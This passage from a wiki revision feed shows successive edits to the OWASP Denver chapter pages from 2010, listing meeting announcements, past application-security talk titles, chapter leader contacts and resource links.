'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''&lt;br /&gt;
&amp;lt;twitter&amp;gt;55021150&amp;lt;/twitter&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| style=&amp;quot;width: 110px; font-size: 95%; color: rgb(0, 0, 0);&amp;quot; | &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Resources====&lt;br /&gt;
&lt;br /&gt;
=====Denver OWASP Chapter Leaders=====&lt;br /&gt;
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org&lt;br /&gt;
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
=====Key OWASP Resources=====&lt;br /&gt;
* http://www.owasp.org/images/4/41/ASVS_One_Page_Handout.pdf&lt;br /&gt;
* http://www.owasp.org/images/3/31/ESAPI_One_Page_Handout.pdf&lt;br /&gt;
* http://www.owasp.org/images/a/a1/Legal_One_Page_Handout.pdf&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/images/a/a3/How_ESAPI_Works.pdf&lt;br /&gt;
* http://www.owasp.org/images/a/ac/LAMP_Should_be_Spelled_LAMPE.pdf&lt;br /&gt;
* http://www.owasp.org/images/0/01/Getting_started_designing_for_a_level_of_assurance.pdf&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/index.php/Agile_Software_Development:_Don%27t_Forget_EVIL_User_Stories&lt;br /&gt;
* http://www.owasp.org/index.php/Man_vs._Code&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/images/4/4e/OWASP_ASVS_2009_Web_App_Std_Release.pdf&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/images/c/cd/PHP-ESAPI_1.0a_install.pdf&lt;br /&gt;
* http://www.owasp.org/images/6/67/PHP-ESAPI_1.0a_ReleaseNotes.pdf&lt;br /&gt;
&lt;br /&gt;
=====Chapter Management Links=====&lt;br /&gt;
[[Pizza|Best pizza in Centennial]]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;br /&gt;
[[Category:OWASP Chapter]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver&amp;diff=89315</id>
		<title>Denver</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver&amp;diff=89315"/>
				<updated>2010-09-15T01:21:28Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Denver|extra=Chapter leaders are [mailto:eduprey@gmail.com Eric Duprey] and [mailto:dcampbell@owasp.org David Campbell].   |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-denver|emailarchives=http://lists.owasp.org/pipermail/owasp-denver}}&lt;br /&gt;
&lt;br /&gt;
==== Local News ====&lt;br /&gt;
&lt;br /&gt;
=====Next Chapter Meeting: [http://denverowasp.eventbrite.com/ RSVP Now!]=====&lt;br /&gt;
[[Denver September 2010 meeting|September 22nd 2010: Eric Duprey: Application Vulnerability Shooting Gallery]]&lt;br /&gt;
&lt;br /&gt;
Next Denver meeting is scheduled for Wed, 22 Aug 2010 at an all new central Denver location.  We've heard your gripes that Raytheon and Dish are too far south, and thanks to the fine folks at Hosting.com are pleased to be hosting our August meeting much closer to downtown, but with free parking! (and, for this meeting, free beer!)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF.  We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).&lt;br /&gt;
&lt;br /&gt;
We are also looking at doing a static analysis working group.  Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.&lt;br /&gt;
&lt;br /&gt;
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.&lt;br /&gt;
&lt;br /&gt;
Interested?  Let us know.  Tweet with hashtag #owasp303 or email us at froc@owasp.org. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Front Range OWASP Conference (FROC 2010) =====&lt;br /&gt;
[[Front_Range_OWASP_Conference_2010|FROC 2010]] was a sellout success! Thanks for your support.  The [http://www.surveymonkey.com/sr.aspx?sm=Fn2UBK3eyju0z2k3B8XpvHvs9s_2bdRO1BS428Of_2f9ZA0_3d survey results] are now posted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====OWASP Podcast=====&lt;br /&gt;
[http://www.owasp.org/index.php/OWASP_Podcast OWASP Podcast]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;Denver&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Questions, Comments==&lt;br /&gt;
Questions can be directed to &lt;br /&gt;
&lt;br /&gt;
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org&lt;br /&gt;
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Chapter Meetings ====&lt;br /&gt;
&lt;br /&gt;
== Future Meetings == &lt;br /&gt;
&amp;lt;!-- TBD&lt;br /&gt;
&lt;br /&gt;
We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF.  We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).&lt;br /&gt;
&lt;br /&gt;
We are also looking at doing a static analysis working group.  Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.&lt;br /&gt;
&lt;br /&gt;
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.&lt;br /&gt;
&lt;br /&gt;
Interested?  Let us know.  Tweet with hashtag #owasp303 or email us at froc@owasp.org. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Denver September 2010 meeting|September 22nd 2010: Eric Duprey: Application Vulnerability Shooting Gallery]]&lt;br /&gt;
&lt;br /&gt;
== Past Meetings ==&lt;br /&gt;
[[Denver August 2010 meeting|August 18th 2010: Clint Pollock: Protecting Your Applications from Backdoors]]&lt;br /&gt;
&lt;br /&gt;
[[Front_Range_OWASP_Conference_2010|June 2nd 2010: Front Range OWASP Conference]]&lt;br /&gt;
&lt;br /&gt;
[[Denver January 2010 meeting|January 20th 2010: John Evans: Securing Webapps: An Illustrative Overview]]&lt;br /&gt;
&lt;br /&gt;
[[Denver November 2009 meeting|November 18th 2009: Anton Rager: Advanced XSS]]&lt;br /&gt;
&lt;br /&gt;
[[Denver August 2009 meeting|August 27th 2009: Jon Rose: Security in the Clouds]]&lt;br /&gt;
&lt;br /&gt;
[[Denver May 2009 meeting|May 2009: Dr. Joseph McComb &amp;amp; and Daniel Weiske: Compliance and application security testing]]&lt;br /&gt;
&lt;br /&gt;
[[Front_Range_OWASP_Conference_2009|March 2009: Front Range OWASP Conference (SnowFROC)]]&lt;br /&gt;
&lt;br /&gt;
[[Denver January 2009 meeting|January 2009: David Campbell &amp;amp; Eric Duprey: Guided Tour: AppSec NYC '08 CTF]]&lt;br /&gt;
&lt;br /&gt;
[[Denver October 2008 meeting|October 2008: Alex Smolen: The OWASP ASP .NET ESAPI]]&lt;br /&gt;
&lt;br /&gt;
[[Denver September 2008 meeting|September 2008: John Dickson: Black Box vs. White Box: Different App Testing Strategies]]&lt;br /&gt;
&lt;br /&gt;
[[Denver August 2008 meeting|August 2008: Dan Cornell: Static Analysis]]&lt;br /&gt;
&lt;br /&gt;
[[Denver July 2008 meeting|July 2008: David Byrne &amp;amp; Eric Duprey: Grendel-Scan]]&lt;br /&gt;
&lt;br /&gt;
[[Front Range OWASP Conference|June 2008: Front Range OWASP Conference: Jeremiah Grossman, Robert Hansen, and more!]]&lt;br /&gt;
&lt;br /&gt;
[[Denver May 2008 meeting|May 2008: David Campbell &amp;amp; Eric Duprey: XSS Attacks &amp;amp; Defenses]]&lt;br /&gt;
&lt;br /&gt;
[[Denver April 2008 meeting|April 2008: Ryan Barnett: Virtual Patching with ModSecurity]]&lt;br /&gt;
&lt;br /&gt;
[[Denver February 2008 meeting|February 2008: Michael Sutton: SQL Injection Revisited]]&lt;br /&gt;
&lt;br /&gt;
[[Denver June 2007 meeting|June 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver April 2007 meeting|April 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver February 2007 meeting|February 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver January 2007 meeting|January 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver November 2006 meeting|November 2006]]&lt;br /&gt;
&lt;br /&gt;
==[[Related_Organizations|Local Organizations of Interest]]==&lt;br /&gt;
&lt;br /&gt;
==== Mailing List ====&lt;br /&gt;
Join the [http://lists.owasp.org/mailman/listinfo/owasp-denver OWASP Denver Mailing List] to receive meeting notifications via email&lt;br /&gt;
&lt;br /&gt;
==== Twitter Feed @owasp303 ====&lt;br /&gt;
Denver OWASP has created a [http://twitter.com/owasp303 Twitter feed @owasp303] to keep you in the loop.  Whilst the mailing list is primarily intended to be low-traffic and only provide updates regarding the times, locations, and topics for chapter meetings, the Twitter feed will also provide noteworthy appsec updates.&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''&lt;br /&gt;
&amp;lt;twitter&amp;gt;55021150&amp;lt;/twitter&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| style=&amp;quot;width: 110px; font-size: 95%; color: rgb(0, 0, 0);&amp;quot; | &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Resources====&lt;br /&gt;
&lt;br /&gt;
=====Denver OWASP Chapter Leaders=====&lt;br /&gt;
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org&lt;br /&gt;
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
=====Key OWASP Resources=====&lt;br /&gt;
* http://www.owasp.org/images/4/41/ASVS_One_Page_Handout.pdf&lt;br /&gt;
* http://www.owasp.org/images/3/31/ESAPI_One_Page_Handout.pdf&lt;br /&gt;
* http://www.owasp.org/images/a/a1/Legal_One_Page_Handout.pdf&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/images/a/a3/How_ESAPI_Works.pdf&lt;br /&gt;
* http://www.owasp.org/images/a/ac/LAMP_Should_be_Spelled_LAMPE.pdf&lt;br /&gt;
* http://www.owasp.org/images/0/01/Getting_started_designing_for_a_level_of_assurance.pdf&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/index.php/Agile_Software_Development:_Don%27t_Forget_EVIL_User_Stories&lt;br /&gt;
* http://www.owasp.org/index.php/Man_vs._Code&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/images/4/4e/OWASP_ASVS_2009_Web_App_Std_Release.pdf&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/images/c/cd/PHP-ESAPI_1.0a_install.pdf&lt;br /&gt;
* http://www.owasp.org/images/6/67/PHP-ESAPI_1.0a_ReleaseNotes.pdf&lt;br /&gt;
&lt;br /&gt;
=====Chapter Management Links=====&lt;br /&gt;
[[Pizza|Best pizza in Centennial]]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;br /&gt;
[[Category:OWASP Chapter]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver&amp;diff=89314</id>
		<title>Denver</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver&amp;diff=89314"/>
				<updated>2010-09-15T01:16:11Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Denver|extra=Chapter leaders are [mailto:eduprey@gmail.com Eric Duprey] and [mailto:dcampbell@owasp.org David Campbell].   |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-denver|emailarchives=http://lists.owasp.org/pipermail/owasp-denver}}&lt;br /&gt;
&lt;br /&gt;
==== Local News ====&lt;br /&gt;
&lt;br /&gt;
=====Next Chapter Meeting: [http://denverowasp.eventbrite.com/ RSVP Now!]=====&lt;br /&gt;
[[Denver August 2010 meeting|August 18th 2010: Clint Pollock: Protecting Your Applications from Backdoors]]&lt;br /&gt;
&lt;br /&gt;
Next Denver meeting is scheduled for Wed, 18 Aug 2010 at an all new central Denver location.  We've heard your gripes that Raytheon and Dish are too far south, and thanks to the fine folks at Hosting.com are pleased to be hosting our August meeting much closer to downtown, but with free parking!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF.  We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).&lt;br /&gt;
&lt;br /&gt;
We are also looking at doing a static analysis working group.  Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.&lt;br /&gt;
&lt;br /&gt;
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.&lt;br /&gt;
&lt;br /&gt;
Interested?  Let us know.  Tweet with hashtag #owasp303 or email us at froc@owasp.org. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Front Range OWASP Conference (FROC 2010) =====&lt;br /&gt;
[[Front_Range_OWASP_Conference_2010|FROC 2010]] was a sellout success! Thanks for your support.  The [http://www.surveymonkey.com/sr.aspx?sm=Fn2UBK3eyju0z2k3B8XpvHvs9s_2bdRO1BS428Of_2f9ZA0_3d survey results] are now posted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====OWASP Podcast=====&lt;br /&gt;
[http://www.owasp.org/index.php/OWASP_Podcast OWASP Podcast]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;Denver&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Questions, Comments==&lt;br /&gt;
Questions can be directed to &lt;br /&gt;
&lt;br /&gt;
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org&lt;br /&gt;
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Chapter Meetings ====&lt;br /&gt;
&lt;br /&gt;
== Future Meetings == &lt;br /&gt;
&amp;lt;!-- TBD&lt;br /&gt;
&lt;br /&gt;
We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF.  We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).&lt;br /&gt;
&lt;br /&gt;
We are also looking at doing a static analysis working group.  Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.&lt;br /&gt;
&lt;br /&gt;
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.&lt;br /&gt;
&lt;br /&gt;
Interested?  Let us know.  Tweet with hashtag #owasp303 or email us at froc@owasp.org. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Denver September 2010 meeting|September 22nd 2010: Eric Duprey: Application Vulnerability Shooting Gallery]]&lt;br /&gt;
&lt;br /&gt;
== Past Meetings ==&lt;br /&gt;
[[Denver August 2010 meeting|August 18th 2010: Clint Pollock: Protecting Your Applications from Backdoors]]&lt;br /&gt;
&lt;br /&gt;
[[Front_Range_OWASP_Conference_2010|June 2nd 2010: Front Range OWASP Conference]]&lt;br /&gt;
&lt;br /&gt;
[[Denver January 2010 meeting|January 20th 2010: John Evans: Securing Webapps: An Illustrative Overview]]&lt;br /&gt;
&lt;br /&gt;
[[Denver November 2009 meeting|November 18th 2009: Anton Rager: Advanced XSS]]&lt;br /&gt;
&lt;br /&gt;
[[Denver August 2009 meeting|August 27th 2009: Jon Rose: Security in the Clouds]]&lt;br /&gt;
&lt;br /&gt;
[[Denver May 2009 meeting|May 2009: Dr. Joseph McComb &amp;amp; and Daniel Weiske: Compliance and application security testing]]&lt;br /&gt;
&lt;br /&gt;
[[Front_Range_OWASP_Conference_2009|March 2009: Front Range OWASP Conference (SnowFROC)]]&lt;br /&gt;
&lt;br /&gt;
[[Denver January 2009 meeting|January 2009: David Campbell &amp;amp; Eric Duprey: Guided Tour: AppSec NYC '08 CTF]]&lt;br /&gt;
&lt;br /&gt;
[[Denver October 2008 meeting|October 2008: Alex Smolen: The OWASP ASP .NET ESAPI]]&lt;br /&gt;
&lt;br /&gt;
[[Denver September 2008 meeting|September 2008: John Dickson: Black Box vs. White Box: Different App Testing Strategies]]&lt;br /&gt;
&lt;br /&gt;
[[Denver August 2008 meeting|August 2008: Dan Cornell: Static Analysis]]&lt;br /&gt;
&lt;br /&gt;
[[Denver July 2008 meeting|July 2008: David Byrne &amp;amp; Eric Duprey: Grendel-Scan]]&lt;br /&gt;
&lt;br /&gt;
[[Front Range OWASP Conference|June 2008: Front Range OWASP Conference: Jeremiah Grossman, Robert Hansen, and more!]]&lt;br /&gt;
&lt;br /&gt;
[[Denver May 2008 meeting|May 2008: David Campbell &amp;amp; Eric Duprey: XSS Attacks &amp;amp; Defenses]]&lt;br /&gt;
&lt;br /&gt;
[[Denver April 2008 meeting|April 2008: Ryan Barnett: Virtual Patching with ModSecurity]]&lt;br /&gt;
&lt;br /&gt;
[[Denver February 2008 meeting|February 2008: Michael Sutton: SQL Injection Revisited]]&lt;br /&gt;
&lt;br /&gt;
[[Denver June 2007 meeting|June 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver April 2007 meeting|April 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver February 2007 meeting|February 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver January 2007 meeting|January 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver November 2006 meeting|November 2006]]&lt;br /&gt;
&lt;br /&gt;
==[[Related_Organizations|Local Organizations of Interest]]==&lt;br /&gt;
&lt;br /&gt;
==== Mailing List ====&lt;br /&gt;
Join the [http://lists.owasp.org/mailman/listinfo/owasp-denver OWASP Denver Mailing List] to receive meeting notifications via email&lt;br /&gt;
&lt;br /&gt;
==== Twitter Feed @owasp303 ====&lt;br /&gt;
Denver OWASP has created a [http://twitter.com/owasp303 Twitter feed @owasp303] to keep you in the loop.  Whilst the mailing list is primarily intended to be low-traffic and only provide updates regarding the times, locations, and topics for chapter meetings, the Twitter feed will also provide noteworthy appsec updates.&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''&lt;br /&gt;
&amp;lt;twitter&amp;gt;55021150&amp;lt;/twitter&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| style=&amp;quot;width: 110px; font-size: 95%; color: rgb(0, 0, 0);&amp;quot; | &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Resources====&lt;br /&gt;
&lt;br /&gt;
=====Denver OWASP Chapter Leaders=====&lt;br /&gt;
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org&lt;br /&gt;
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
=====Key OWASP Resources=====&lt;br /&gt;
* http://www.owasp.org/images/4/41/ASVS_One_Page_Handout.pdf&lt;br /&gt;
* http://www.owasp.org/images/3/31/ESAPI_One_Page_Handout.pdf&lt;br /&gt;
* http://www.owasp.org/images/a/a1/Legal_One_Page_Handout.pdf&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/images/a/a3/How_ESAPI_Works.pdf&lt;br /&gt;
* http://www.owasp.org/images/a/ac/LAMP_Should_be_Spelled_LAMPE.pdf&lt;br /&gt;
* http://www.owasp.org/images/0/01/Getting_started_designing_for_a_level_of_assurance.pdf&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/index.php/Agile_Software_Development:_Don%27t_Forget_EVIL_User_Stories&lt;br /&gt;
* http://www.owasp.org/index.php/Man_vs._Code&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/images/4/4e/OWASP_ASVS_2009_Web_App_Std_Release.pdf&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/images/c/cd/PHP-ESAPI_1.0a_install.pdf&lt;br /&gt;
* http://www.owasp.org/images/6/67/PHP-ESAPI_1.0a_ReleaseNotes.pdf&lt;br /&gt;
&lt;br /&gt;
=====Chapter Management Links=====&lt;br /&gt;
[[Pizza|Best pizza in Centennial]]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;br /&gt;
[[Category:OWASP Chapter]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89313</id>
		<title>Denver September 2010 meeting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89313"/>
				<updated>2010-09-15T01:15:26Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Wednesday 22 September 2010, 6pm @ [http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;q=hosting.com&amp;amp;sll=39.699262,-104.986725&amp;amp;sspn=0.159814,0.258522&amp;amp;ie=UTF8&amp;amp;radius=8.24&amp;amp;split=1&amp;amp;rq=1&amp;amp;ev=zi&amp;amp;hq=hosting.com&amp;amp;hnear=&amp;amp;ll=39.699262,-104.986725&amp;amp;spn=0.159814,0.258522&amp;amp;z=12&amp;amp;iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==&lt;br /&gt;
&lt;br /&gt;
=== Eric Duprey: &amp;quot;Application Vulnerability Shooting Gallery&amp;quot; ===&lt;br /&gt;
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged.   Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high.  One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications.  It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Presenter: '''Eric Duprey'''&lt;br /&gt;
&lt;br /&gt;
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter.  For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code.  Eric has presented talks at major security conferences including DEFCON and SANS penetration testing summit.&lt;br /&gt;
&lt;br /&gt;
=== Agenda ===&lt;br /&gt;
* 6pm: Pizza &amp;amp; pop&lt;br /&gt;
* 6:30pm: Introduction and Chapter business&lt;br /&gt;
* 6:45pm --&amp;gt; 8pm: Presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89204</id>
		<title>Denver September 2010 meeting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89204"/>
				<updated>2010-09-13T17:08:14Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Wednesday 29 September 2010, 6pm @ [http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;q=hosting.com&amp;amp;sll=39.699262,-104.986725&amp;amp;sspn=0.159814,0.258522&amp;amp;ie=UTF8&amp;amp;radius=8.24&amp;amp;split=1&amp;amp;rq=1&amp;amp;ev=zi&amp;amp;hq=hosting.com&amp;amp;hnear=&amp;amp;ll=39.699262,-104.986725&amp;amp;spn=0.159814,0.258522&amp;amp;z=12&amp;amp;iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==&lt;br /&gt;
&lt;br /&gt;
=== Eric Duprey: &amp;quot;Application Vulnerability Shooting Gallery&amp;quot; ===&lt;br /&gt;
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged.   Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high.  One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications.  It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Presenter: '''Eric Duprey'''&lt;br /&gt;
&lt;br /&gt;
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter.  For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code.  Eric has presented talks at major security conferences including DEFCON and SANS penetration testing summit.&lt;br /&gt;
&lt;br /&gt;
=== Agenda ===&lt;br /&gt;
* 6pm: Pizza &amp;amp; pop&lt;br /&gt;
* 6:30pm: Introduction and Chapter business&lt;br /&gt;
* 6:45pm --&amp;gt; 8pm: Presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver&amp;diff=89113</id>
		<title>Denver</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver&amp;diff=89113"/>
				<updated>2010-09-12T04:44:21Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Denver|extra=Chapter leaders are [mailto:eduprey@gmail.com Eric Duprey] and [mailto:dcampbell@owasp.org David Campbell].   |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-denver|emailarchives=http://lists.owasp.org/pipermail/owasp-denver}}&lt;br /&gt;
&lt;br /&gt;
==== Local News ====&lt;br /&gt;
&lt;br /&gt;
=====Next Chapter Meeting: [http://denverowasp.eventbrite.com/ RSVP Now!]=====&lt;br /&gt;
[[Denver August 2010 meeting|August 18th 2010: Clint Pollock: Protecting Your Applications from Backdoors]]&lt;br /&gt;
&lt;br /&gt;
Next Denver meeting is scheduled for Wed, 18 Aug 2010 at an all new central Denver location.  We've heard your gripes that Raytheon and Dish are too far south, and thanks to the fine folks at Hosting.com are pleased to be hosting our August meeting much closer to downtown, but with free parking!&lt;br /&gt;
